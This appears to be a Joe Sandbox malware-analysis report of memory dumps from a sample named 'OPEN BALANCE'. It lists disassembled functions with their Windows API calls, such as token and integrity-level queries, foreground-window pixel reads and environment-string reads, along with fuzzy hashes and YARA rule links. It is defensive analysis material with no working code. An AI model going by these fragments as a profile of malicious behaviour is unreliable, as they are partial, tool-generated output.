Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: c05799ed7ab4bbdcf0129132762cedfe33fab367a445f724b335edfd63ff182f
Instruction ID: fc22a0ee5820934649765703031d02f640d2420e0f143796571868e246d3a3da
Opcode Fuzzy Hash: c05799ed7ab4bbdcf0129132762cedfe33fab367a445f724b335edfd63ff182f
Instruction Fuzzy Hash: 76314C71600206AFDB20DFA9C8849BBBBF9FB14355B10446EF516D2341DB70EE44DB60

Function 008A1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 008A1915
PostMessageW.USER32(00000001,00000201,00000001), ref: 008A19C1
Sleep.KERNEL32(00000000,?,?,?), ref: 008A19C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 008A19DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 008A19E2

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: c90668380b3fd54ab277c4c9908bbd618a22e443c2c51ca90b610c673fcd44df
Instruction ID: e8048b5e5b09692c34b55e1dd538bc377366bc12e7f5848a712bcfbf6b4c8291
Opcode Fuzzy Hash: c90668380b3fd54ab277c4c9908bbd618a22e443c2c51ca90b610c673fcd44df
Instruction Fuzzy Hash: C3318B71A00219EFDF00CFA8D99DA9E3BB5FB05315F144229F921EB2D1C7709944CB90

Function 008D5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 008D5745
SendMessageW.USER32(?,00001074,?,00000001), ref: 008D579D
_wcslen.LIBCMT ref: 008D57AF
_wcslen.LIBCMT ref: 008D57BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 008D5816

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: ef432336d84368ca4055c12cb2b71f791c7e83f56fb5f655b67ca0542000c774
Instruction ID: fa1fa2ec8c869ad271489f9ef2db92b244eb2d8b40703814c73dc9369829f115
Opcode Fuzzy Hash: ef432336d84368ca4055c12cb2b71f791c7e83f56fb5f655b67ca0542000c774
Instruction Fuzzy Hash: 95218071904618EADB209FA4DC85AEE7BB8FF14724F10835BE929EA280D7708985CF51

Function 008C0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 008C0951
GetForegroundWindow.USER32 ref: 008C0968
GetDC.USER32(00000000), ref: 008C09A4
GetPixel.GDI32(00000000,?,00000003), ref: 008C09B0
ReleaseDC.USER32(00000000,00000003), ref: 008C09E8

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: b777a31493a1e815ba44984b577610980ab85e65f91f59598255f7f994ea3b0b
Instruction ID: 8ab623c650d5427d39d055d08543bc7b5dc71b54873357a60d6d887b8080cfab
Opcode Fuzzy Hash: b777a31493a1e815ba44984b577610980ab85e65f91f59598255f7f994ea3b0b
Instruction Fuzzy Hash: 81215E35A00214AFD704EF69D888AAEBBF9FF44740F04816DE84AD7352CA70EC04CB50

Function 0085990F Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 008598CC
SetTextColor.GDI32(?,?), ref: 008598D6
SetBkMode.GDI32(?,00000001), ref: 008598E9
GetStockObject.GDI32(00000005), ref: 008598F1
GetWindowLongW.USER32(?,000000EB), ref: 00859952

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Color$LongModeObjectStockTextWindow
String ID:
API String ID: 1860813098-0
Opcode ID: 8154e5cd5c67bffe9d2770e48f6ceb9c3f0f093438bcda1f21a6a6c9e5febf39
Instruction ID: 0ec54d1e6d18f61e691bc8718142230cc307e89bb937df29e4a64481f0974fd8
Opcode Fuzzy Hash: 8154e5cd5c67bffe9d2770e48f6ceb9c3f0f093438bcda1f21a6a6c9e5febf39
Instruction Fuzzy Hash: AD21D371546250DFCB228F34EC55AE53FA0FF17332B08029EEAD6CA1A2C6355845DB10

Function 0087CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0087CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0087CDE9

Part of subcall function 00873820: RtlAllocateHeap.NTDLL(00000000,?,00911444), ref: 00873852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0087CE0F
_free.LIBCMT ref: 0087CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0087CE31

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a20bd50b6fb39fc49a56537cff653a7045461572a615dbb2d3d0fb275197d036
Instruction ID: f607c8a84c784e53523a28f143833a553aa3df822201fe9d1317b4e50837933d
Opcode Fuzzy Hash: a20bd50b6fb39fc49a56537cff653a7045461572a615dbb2d3d0fb275197d036
Instruction Fuzzy Hash: 4001D8736026157F272116BAAC88D7B7F6DFFC6BA1315822EF909C7204DB61CD0181B1

Function 00859639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00859693
SelectObject.GDI32(?,00000000), ref: 008596A2
BeginPath.GDI32(?), ref: 008596B9
SelectObject.GDI32(?,00000000), ref: 008596E2

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: ed912b2b3771db3b6d8e0a006635607912078dc0782ace063f56d540c6f13164
Instruction ID: b7de7dd196c0ffc53f146cbdb1d54991d6b50634732b77d5e43eec9057c3aac6
Opcode Fuzzy Hash: ed912b2b3771db3b6d8e0a006635607912078dc0782ace063f56d540c6f13164
Instruction Fuzzy Hash: C9218030926306FBDF119F28EC157E97BA9FB20356F508216F960E61B0D3745899EF90

Function 008A5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 008A5726
_memcmp.LIBVCRUNTIME ref: 008A5744
_memcmp.LIBVCRUNTIME ref: 008A5757
_memcmp.LIBVCRUNTIME ref: 008A576F
_memcmp.LIBVCRUNTIME ref: 008A5787

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 9aa06142b6b6a15ef989f7fe7ebfc8605a33d22e0ad24233351f92667489a7c5
Instruction ID: b437a3a912b7e2d443eeeede2ba7b2ffa55de109a4e71eeaeca54f047163b462
Opcode Fuzzy Hash: 9aa06142b6b6a15ef989f7fe7ebfc8605a33d22e0ad24233351f92667489a7c5
Instruction Fuzzy Hash: 1F01F961241A19FBF61851149E42FBB734CFB223A8F048021FE16FAB42F724ED5082A1

Function 00872DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0086F2DE,00873863,00911444,?,0085FDF5,?,?,0084A976,00000010,00911440,008413FC,?,008413C6), ref: 00872DFD
_free.LIBCMT ref: 00872E32
_free.LIBCMT ref: 00872E59
SetLastError.KERNEL32(00000000,00841129), ref: 00872E66
SetLastError.KERNEL32(00000000,00841129), ref: 00872E6F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: cbaedfdcefaecf89f60a624c3a946f7537d0ff75677b676f92a7082591f1569b
Instruction ID: 42ea75e03374d7e14950ebc6a942428a34d37980fe2732f980261dab1a516e85
Opcode Fuzzy Hash: cbaedfdcefaecf89f60a624c3a946f7537d0ff75677b676f92a7082591f1569b
Instruction Fuzzy Hash: 5201D1332096046BC61267386C45E2B275DFBC63A9B24C129F82DE22DBEB60C8415022

Function 008AE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 008AE997
QueryPerformanceFrequency.KERNEL32(?), ref: 008AE9A5
Sleep.KERNEL32(00000000), ref: 008AE9AD
QueryPerformanceCounter.KERNEL32(?), ref: 008AE9B7
Sleep.KERNEL32 ref: 008AE9F3

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 9ded24fb2369f10792ad6276da48b05e7745c684ff140d1a4924de1c18370b5a
Instruction ID: 8dc5380f32a28bf6d8e332c5c7355c949dbfb74836711b635fb123e32109b715
Opcode Fuzzy Hash: 9ded24fb2369f10792ad6276da48b05e7745c684ff140d1a4924de1c18370b5a
Instruction Fuzzy Hash: 63011731C0262EDBDF00ABE5D859AEEBF78FB0A701F040A56E502F2241CB709555CBA1

Function 008A10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008A1114
GetLastError.KERNEL32(?,00000000,00000000,?,?,008A0B9B,?,?,?), ref: 008A1120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,008A0B9B,?,?,?), ref: 008A112F
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 008A1136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008A114D

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
String ID:
API String ID: 883493501-0
Opcode ID: a5ab7793e3185241f7600c1f16c3d68b7cbe8af1b65c69b205cf7b33e6ae8030
Instruction ID: 23b43bc4d154f74a5f8c6f908a3d2292685514d5958f29a1123c516e68268a2b
Opcode Fuzzy Hash: a5ab7793e3185241f7600c1f16c3d68b7cbe8af1b65c69b205cf7b33e6ae8030
Instruction Fuzzy Hash: EC011975201216BFEF114FA9DC4DE6A3B6EFF8A3A4B20451AFA45D7360DA31DC00DA60

Function 008A0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008A0FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008A0FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008A0FE5
RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 008A0FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008A1002

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: e59708e5d05bfc934dd972bcd82245b9abba9c9c49b143d20b0b34c1c87a1d05
Instruction ID: d4029fc5c46c5333fa06a37ad8f85d0e96521b7456abc3504dee513488a79eb7
Opcode Fuzzy Hash: e59708e5d05bfc934dd972bcd82245b9abba9c9c49b143d20b0b34c1c87a1d05
Instruction Fuzzy Hash: 0FF06D35241712EBEB214FA4DC4DF5A3BADFF8AB62F114516FA45C7291CA74DC40CA60

Function 008A1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008A102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008A1036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008A1045
RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 008A104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008A1062

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: a295c8932d61328994ab9d2fd698b8d54952fd99272f191828c80a8300ebdb19
Instruction ID: f73bc61825bfc501d50914d22368469eb9e5cc029bc409b0a29469352593cc5e
Opcode Fuzzy Hash: a295c8932d61328994ab9d2fd698b8d54952fd99272f191828c80a8300ebdb19
Instruction Fuzzy Hash: 91F06D35241712EBEB219FA4EC4DF5A3BADFF8A761F110516FA45C7290CA70DC40CA60

Function 008B030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,008B017D,?,008B32FC,?,00000001,00882592,?), ref: 008B0324
CloseHandle.KERNEL32(?,?,?,?,008B017D,?,008B32FC,?,00000001,00882592,?), ref: 008B0331
CloseHandle.KERNEL32(?,?,?,?,008B017D,?,008B32FC,?,00000001,00882592,?), ref: 008B033E
CloseHandle.KERNEL32(?,?,?,?,008B017D,?,008B32FC,?,00000001,00882592,?), ref: 008B034B
CloseHandle.KERNEL32(?,?,?,?,008B017D,?,008B32FC,?,00000001,00882592,?), ref: 008B0358
CloseHandle.KERNEL32(?,?,?,?,008B017D,?,008B32FC,?,00000001,00882592,?), ref: 008B0365

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 36f468abc71af635f99eb572cfb3dc0041ac1b3d6f0d8b778c60d9649d1f4503
Instruction ID: b8542fc032414ede448b178c153d79f51ed5faa1021667e607c4196c6ea5487e
Opcode Fuzzy Hash: 36f468abc71af635f99eb572cfb3dc0041ac1b3d6f0d8b778c60d9649d1f4503
Instruction Fuzzy Hash: BD019C72801B159FCB30AF66D890857FBF9FE642153158A3FD19692A31C7B1A998CE80

Function 0087D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0087D752

Part of subcall function 008729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0087D7D1,00000000,00000000,00000000,00000000,?,0087D7F8,00000000,00000007,00000000,?,0087DBF5,00000000), ref: 008729DE
Part of subcall function 008729C8: GetLastError.KERNEL32(00000000,?,0087D7D1,00000000,00000000,00000000,00000000,?,0087D7F8,00000000,00000007,00000000,?,0087DBF5,00000000,00000000), ref: 008729F0

_free.LIBCMT ref: 0087D764
_free.LIBCMT ref: 0087D776
_free.LIBCMT ref: 0087D788
_free.LIBCMT ref: 0087D79A

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 60c95a0b61fb7af508d21e8570cbef2fed80e8c1a8108f8287ac37708158abfb
Instruction ID: 98d68e6f5f1b5aa26316e0b2ce7b8e7e352ac0d74aa49ad575efca712e9b798b
Opcode Fuzzy Hash: 60c95a0b61fb7af508d21e8570cbef2fed80e8c1a8108f8287ac37708158abfb
Instruction Fuzzy Hash: EBF04F72514304ABC629EB78F9C1E16BBEDFF44350B988805F54CE750AC720FC809665

Function 008A5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 008A5C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 008A5C6F
MessageBeep.USER32(00000000), ref: 008A5C87
KillTimer.USER32(?,0000040A), ref: 008A5CA3
EndDialog.USER32(?,00000001), ref: 008A5CBD

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
